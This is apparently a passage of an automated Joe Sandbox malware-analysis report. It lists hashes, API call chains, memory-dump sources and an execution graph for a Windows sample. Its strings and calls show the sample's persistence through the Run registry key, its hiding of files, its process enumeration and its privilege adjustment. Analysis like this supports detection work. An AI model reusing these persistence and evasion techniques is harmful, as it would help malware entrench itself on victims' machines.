                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction ID: 9c637bb13ebc716c8c6e56bd135419432ebee93f92f755ca5a6732f06e953cfc
                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction Fuzzy Hash: A601802791CA42C2E7349B22E89826D6770FBDCBB9F640531E94EC2674CF3CD5958E40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction ID: 54c05f78195089629e697d4d134e750fd102d8191ae3feb5cfc05edb06005157
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction Fuzzy Hash: 7921CF32A2C986C2E7709B13E88C36A6360FBC4765F604235D55E825A8DF3DD855CF40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction ID: e1af3d9a5e225d8e7919a64776b1106660b6bd228598faa0d31fa736879a5f18
                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 35019E2792CA42C2E7249B23E89C26D6370FBD8B6AF600535E98EC6674CF3CD5548A40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction ID: 83f9c672ba7bd5d4c9acfb5d541e5f973acccc7f479c4bf569d2da135c86c9ee
                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                  • Instruction Fuzzy Hash: 9131A77661CAC4C6D7709B1AE4D87AAA3A0F788750F500125DA8EC3B68DF3CD554CF00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction ID: 8096166a96b608b783d7c9761adf647f6d3ef893d3b5ad9e49e5b5058046fbeb
                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 38010C76628A80CAD7508F15F88871AB774F7887A4FA01225EB8D83B68DF7DC155CF00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction ID: b2c8df9152c60b3c0c1c9f28a7dd570d2e0edb0630302583cb8e1740cca2c116
                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F110072A2CA86C2F7709B12E4CC36AA3A0FB94765F604335D69D82698DF3DD504CF40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction ID: 0c694b6ec1756654bc65ad789f44c6112afcfbcc8fdabf6385e891a990145c7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5011F476628A40C6D7908B15F48466A77A0FB847B1F605331F96E83BA8DF7CD545CF00
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
                                                                                                                                                                    • Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995
                                                                                                                                                                    • Part of subcall function 00007FF6743D46E4: CreateFileW.KERNEL32 ref: 00007FF6743D472B
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: GetCurrentProcess.KERNEL32 ref: 00007FF6743D414B
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: OpenProcessToken.ADVAPI32 ref: 00007FF6743D415E
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6743D4186
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6743D41B1
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: CloseHandle.KERNEL32 ref: 00007FF6743D41BC
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: OpenProcess.KERNEL32 ref: 00007FF6743D41D1
                                                                                                                                                                    • Part of subcall function 00007FF6743D40E4: CloseHandle.KERNEL32 ref: 00007FF6743D4249
                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF6743D3037
                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF6743D304A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction ID: 761b9925506715ea6dfc695afe5ab42d2c49c138741a513ae3cacfa060583447
                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B11D332A28A82C6F710EB16E8DC3A977A0FB88765FA04135E54DC3665DF3CE1598F40

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:23.2%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:482
                                                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                                                  execution_graph 838 7ff7a91b345c 898 7ff7a91b10a0 838->898 843 7ff7a91b3474 ExitProcess 844 7ff7a91b347c 1132 7ff7a91b4264 GetCurrentProcess OpenProcessToken 844->1132 848 7ff7a91b3497 849 7ff7a91b34fb 848->849 850 7ff7a91b34ac 848->850 855 7ff7a91b3510 849->855 856 7ff7a91b354c 849->856 851 7ff7a91b43a4 3 API calls 850->851 852 7ff7a91b34b8 851->852 853 7ff7a91b34d2 ExitProcess 852->853 854 7ff7a91b34bf 852->854 857 7ff7a91b43a4 3 API calls 854->857 858 7ff7a91b43a4 3 API calls 855->858 862 7ff7a91b3561 856->862 863 7ff7a91b35a2 856->863 859 7ff7a91b34cb 857->859 860 7ff7a91b351c 858->860 859->853 861 7ff7a91b34da 859->861 864 7ff7a91b3523 ExitProcess 860->864 865 7ff7a91b352b 860->865 1151 7ff7a91b32ec 861->1151 1147 7ff7a91b43a4 CreateMutexExA 862->1147 1165 7ff7a91b3a74 863->1165 1160 7ff7a91b327c 865->1160 870 7ff7a91b3530 874 7ff7a91b3544 ExitProcess 870->874 875 7ff7a91b3537 Sleep 870->875 872 7ff7a91b34df 877 7ff7a91b34e6 Sleep 872->877 878 7ff7a91b34f3 ExitProcess 872->878 875->870 877->872 879 7ff7a91b3574 ExitProcess 880 7ff7a91b357c 882 7ff7a91b327c 20 API calls 880->882 885 7ff7a91b3581 882->885 883 7ff7a91b35ba 886 7ff7a91b43a4 3 API calls 883->886 884 7ff7a91b360e 7 API calls 887 7ff7a91b3595 ExitProcess 885->887 888 7ff7a91b3588 Sleep 885->888 889 7ff7a91b35c6 886->889 888->885 890 7ff7a91b35e0 ExitProcess 889->890 891 7ff7a91b43a4 3 API calls 889->891 892 7ff7a91b35d9 891->892 892->890 893 7ff7a91b35e8 892->893 894 7ff7a91b32ec 47 API calls 893->894 895 7ff7a91b35ed 894->895 896 7ff7a91b3601 ExitProcess 895->896 897 7ff7a91b35f4 Sleep 895->897 897->895 1175 7ff7a91b1000 LoadLibraryA GetProcAddress 898->1175 900 7ff7a91b113a 1176 7ff7a91b1000 LoadLibraryA GetProcAddress 900->1176 902 7ff7a91b1154 1177 7ff7a91b1050 LoadLibraryA GetProcAddress 902->1177 904 7ff7a91b116e 1178 7ff7a91b1050 LoadLibraryA GetProcAddress 904->1178 906 7ff7a91b1188 1179 7ff7a91b1050 LoadLibraryA GetProcAddress 906->1179 908 7ff7a91b11a2 1180 7ff7a91b1050 LoadLibraryA GetProcAddress 908->1180 910 7ff7a91b11bc 1181 7ff7a91b1050 LoadLibraryA GetProcAddress 910->1181 912 7ff7a91b11d6 1182 7ff7a91b1050 LoadLibraryA GetProcAddress 912->1182 914 7ff7a91b11f0 1183 7ff7a91b1050 LoadLibraryA GetProcAddress 914->1183 916 7ff7a91b120a 1184 7ff7a91b1050 LoadLibraryA GetProcAddress 916->1184 918 7ff7a91b1224 1185 7ff7a91b1050 LoadLibraryA GetProcAddress 918->1185 920 7ff7a91b123e 1186 7ff7a91b1000 LoadLibraryA GetProcAddress 920->1186 922 7ff7a91b1258 1187 7ff7a91b1000 LoadLibraryA GetProcAddress 922->1187 924 7ff7a91b1272 1188 7ff7a91b1000 LoadLibraryA GetProcAddress 924->1188 926 7ff7a91b128c 1189 7ff7a91b1000 LoadLibraryA GetProcAddress 926->1189 928 7ff7a91b12a6 1190 7ff7a91b1050 LoadLibraryA GetProcAddress 928->1190 930 7ff7a91b12c0 1191 7ff7a91b1050 LoadLibraryA GetProcAddress 930->1191 932 7ff7a91b12da 1192 7ff7a91b1050 LoadLibraryA GetProcAddress 932->1192 934 7ff7a91b12f4 1193 7ff7a91b1050 LoadLibraryA GetProcAddress 934->1193 936 7ff7a91b130e 1194 7ff7a91b1050 LoadLibraryA GetProcAddress 936->1194 938 7ff7a91b1328 1195 7ff7a91b1050 LoadLibraryA GetProcAddress 938->1195 940 7ff7a91b1342 1196 7ff7a91b1050 LoadLibraryA GetProcAddress 940->1196 942 7ff7a91b135c 1197 7ff7a91b1050 LoadLibraryA GetProcAddress 942->1197 944 7ff7a91b1376 1198 7ff7a91b1050 LoadLibraryA GetProcAddress 944->1198 946 7ff7a91b1390 1199 7ff7a91b1050 LoadLibraryA GetProcAddress 946->1199 948 7ff7a91b13aa 1200 7ff7a91b1050 LoadLibraryA GetProcAddress 948->1200 950 7ff7a91b13c4 1201 7ff7a91b1050 LoadLibraryA GetProcAddress 950->1201 952 7ff7a91b13de 1202 7ff7a91b1050 LoadLibraryA GetProcAddress 952->1202 954 7ff7a91b13f8 1203 7ff7a91b1050 LoadLibraryA GetProcAddress 954->1203 956 7ff7a91b1412 1204 7ff7a91b1050 LoadLibraryA GetProcAddress 956->1204 958 7ff7a91b142c 1205 7ff7a91b1050 LoadLibraryA GetProcAddress 958->1205 960 7ff7a91b1446 1206 7ff7a91b1050 LoadLibraryA GetProcAddress 960->1206 962 7ff7a91b1460 1207 7ff7a91b1050 LoadLibraryA GetProcAddress 962->1207 964 7ff7a91b147a 1208 7ff7a91b1050 LoadLibraryA GetProcAddress 964->1208 966 7ff7a91b1494 1209 7ff7a91b1050 LoadLibraryA GetProcAddress 966->1209 968 7ff7a91b14ae 1210 7ff7a91b1050 LoadLibraryA GetProcAddress 968->1210 970 7ff7a91b14c8 1211 7ff7a91b1050 LoadLibraryA GetProcAddress 970->1211 972 7ff7a91b14e2 1212 7ff7a91b1050 LoadLibraryA GetProcAddress 972->1212 974 7ff7a91b14fc 1213 7ff7a91b1050 LoadLibraryA GetProcAddress 974->1213 976 7ff7a91b1516 1214 7ff7a91b1050 LoadLibraryA GetProcAddress 976->1214 978 7ff7a91b1530 1215 7ff7a91b1050 LoadLibraryA GetProcAddress 978->1215 980 7ff7a91b154a 1216 7ff7a91b1050 LoadLibraryA GetProcAddress 980->1216 982 7ff7a91b1564 1217 7ff7a91b1050 LoadLibraryA GetProcAddress 982->1217 984 7ff7a91b157e 1218 7ff7a91b1050 LoadLibraryA GetProcAddress 984->1218 986 7ff7a91b1598 1219 7ff7a91b1050 LoadLibraryA GetProcAddress 986->1219 988 7ff7a91b15b2 1220 7ff7a91b1050 LoadLibraryA GetProcAddress 988->1220 990 7ff7a91b15cc 1221 7ff7a91b1050 LoadLibraryA GetProcAddress 990->1221 992 7ff7a91b15e6 1222 7ff7a91b1050 LoadLibraryA GetProcAddress 992->1222 994 7ff7a91b1600 1223 7ff7a91b1050 LoadLibraryA GetProcAddress 994->1223 996 7ff7a91b161a 1224 7ff7a91b1050 LoadLibraryA GetProcAddress 996->1224 998 7ff7a91b1634 1225 7ff7a91b1050 LoadLibraryA GetProcAddress 998->1225 1000 7ff7a91b164e 1226 7ff7a91b1050 LoadLibraryA GetProcAddress 1000->1226 1002 7ff7a91b1668 1227 7ff7a91b1050 LoadLibraryA GetProcAddress 1002->1227 1004 7ff7a91b1682 1228 7ff7a91b1050 LoadLibraryA GetProcAddress 1004->1228 1006 7ff7a91b169c 1229 7ff7a91b1050 LoadLibraryA GetProcAddress 1006->1229 1008 7ff7a91b16b6 1230 7ff7a91b1050 LoadLibraryA GetProcAddress 1008->1230 1010 7ff7a91b16d0 1231 7ff7a91b1050 LoadLibraryA GetProcAddress 1010->1231 1012 7ff7a91b16ea 1232 7ff7a91b1050 LoadLibraryA GetProcAddress 1012->1232 1014 7ff7a91b1704 1233 7ff7a91b1050 LoadLibraryA GetProcAddress 1014->1233 1016 7ff7a91b171e 1234 7ff7a91b1050 LoadLibraryA GetProcAddress 1016->1234 1018 7ff7a91b1738 1235 7ff7a91b1050 LoadLibraryA GetProcAddress 1018->1235 1020 7ff7a91b1752 1236 7ff7a91b1050 LoadLibraryA GetProcAddress 1020->1236 1022 7ff7a91b176c 1237 7ff7a91b1050 LoadLibraryA GetProcAddress 1022->1237 1024 7ff7a91b1786 1238 7ff7a91b1050 LoadLibraryA GetProcAddress 1024->1238 1026 7ff7a91b17a0 1239 7ff7a91b1050 LoadLibraryA GetProcAddress 1026->1239 1028 7ff7a91b17ba 1240 7ff7a91b1050 LoadLibraryA GetProcAddress 1028->1240 1030 7ff7a91b17d4 1241 7ff7a91b1050 LoadLibraryA GetProcAddress 1030->1241 1032 7ff7a91b17ee 1242 7ff7a91b1050 LoadLibraryA GetProcAddress 1032->1242 1034 7ff7a91b1808 1243 7ff7a91b1050 LoadLibraryA GetProcAddress 1034->1243 1036 7ff7a91b1822 1244 7ff7a91b1050 LoadLibraryA GetProcAddress 1036->1244 1038 7ff7a91b183c 1245 7ff7a91b1050 LoadLibraryA GetProcAddress 1038->1245 1040 7ff7a91b1856 1246 7ff7a91b1050 LoadLibraryA GetProcAddress 1040->1246 1042 7ff7a91b1870 1247 7ff7a91b1050 LoadLibraryA GetProcAddress 1042->1247 1044 7ff7a91b188a 1248 7ff7a91b1050 LoadLibraryA GetProcAddress 1044->1248 1046 7ff7a91b18a4 1249 7ff7a91b1050 LoadLibraryA GetProcAddress 1046->1249 1048 7ff7a91b18be 1250 7ff7a91b1050 LoadLibraryA GetProcAddress 1048->1250 1050 7ff7a91b18d8 1251 7ff7a91b1050 LoadLibraryA GetProcAddress 1050->1251 1052 7ff7a91b18f2 1252 7ff7a91b1050 LoadLibraryA GetProcAddress 1052->1252 1054 7ff7a91b190c 1253 7ff7a91b1050 LoadLibraryA GetProcAddress 1054->1253 1056 7ff7a91b1926 1254 7ff7a91b1050 LoadLibraryA GetProcAddress 1056->1254 1058 7ff7a91b1940 1255 7ff7a91b1050 LoadLibraryA GetProcAddress 1058->1255 1060 7ff7a91b195a 1256 7ff7a91b1050 LoadLibraryA GetProcAddress 1060->1256 1062 7ff7a91b1974 1257 7ff7a91b1050 LoadLibraryA GetProcAddress 1062->1257 1064 7ff7a91b198e 1258 7ff7a91b1050 LoadLibraryA GetProcAddress 1064->1258 1066 7ff7a91b19a8 1259 7ff7a91b1050 LoadLibraryA GetProcAddress 1066->1259 1068 7ff7a91b19c2 1260 7ff7a91b1050 LoadLibraryA GetProcAddress 1068->1260 1070 7ff7a91b19dc 1261 7ff7a91b1050 LoadLibraryA GetProcAddress 1070->1261 1072 7ff7a91b19f6 1262 7ff7a91b1050 LoadLibraryA GetProcAddress 1072->1262 1074 7ff7a91b1a10 1263 7ff7a91b1050 LoadLibraryA GetProcAddress 1074->1263 1076 7ff7a91b1a2a 1264 7ff7a91b1050 LoadLibraryA GetProcAddress 1076->1264 1078 7ff7a91b1a44 1265 7ff7a91b1050 LoadLibraryA GetProcAddress 1078->1265 1080 7ff7a91b1a5e 1266 7ff7a91b1050 LoadLibraryA GetProcAddress 1080->1266 1082 7ff7a91b1a78 1267 7ff7a91b1050 LoadLibraryA GetProcAddress 1082->1267 1084 7ff7a91b1a92 1268 7ff7a91b1050 LoadLibraryA GetProcAddress 1084->1268 1086 7ff7a91b1aac 1269 7ff7a91b1050 LoadLibraryA GetProcAddress 1086->1269 1088 7ff7a91b1ac6 1270 7ff7a91b1050 LoadLibraryA GetProcAddress 1088->1270 1090 7ff7a91b1ae0 1271 7ff7a91b1050 LoadLibraryA GetProcAddress 1090->1271 1092 7ff7a91b1afa 1272 7ff7a91b1050 LoadLibraryA GetProcAddress 1092->1272 1094 7ff7a91b1b14 1273 7ff7a91b1050 LoadLibraryA GetProcAddress 1094->1273 1096 7ff7a91b1b2e 1274 7ff7a91b1000 LoadLibraryA GetProcAddress 1096->1274 1098 7ff7a91b1b48 1275 7ff7a91b1050 LoadLibraryA GetProcAddress 1098->1275 1100 7ff7a91b1b62 1276 7ff7a91b1050 LoadLibraryA GetProcAddress 1100->1276 1102 7ff7a91b1b7c 1277 7ff7a91b1050 LoadLibraryA GetProcAddress 1102->1277 1104 7ff7a91b1b96 1278 7ff7a91b1050 LoadLibraryA GetProcAddress 1104->1278 1106 7ff7a91b1bb0 1279 7ff7a91b1050 LoadLibraryA GetProcAddress 1106->1279 1108 7ff7a91b1bca 1280 7ff7a91b1050 LoadLibraryA GetProcAddress 1108->1280 1110 7ff7a91b1be4 1281 7ff7a91b1050 LoadLibraryA GetProcAddress 1110->1281 1112 7ff7a91b1bfe 1282 7ff7a91b1000 LoadLibraryA GetProcAddress 1112->1282 1114 7ff7a91b1c18 1283 7ff7a91b1000 LoadLibraryA GetProcAddress 1114->1283 1116 7ff7a91b1c32 1284 7ff7a91b1050 LoadLibraryA GetProcAddress 1116->1284 1118 7ff7a91b1c4c 1285 7ff7a91b1050 LoadLibraryA GetProcAddress 1118->1285 1120 7ff7a91b1c66 1286 7ff7a91b1050 LoadLibraryA GetProcAddress 1120->1286 1122 7ff7a91b1c80 1287 7ff7a91b1050 LoadLibraryA GetProcAddress 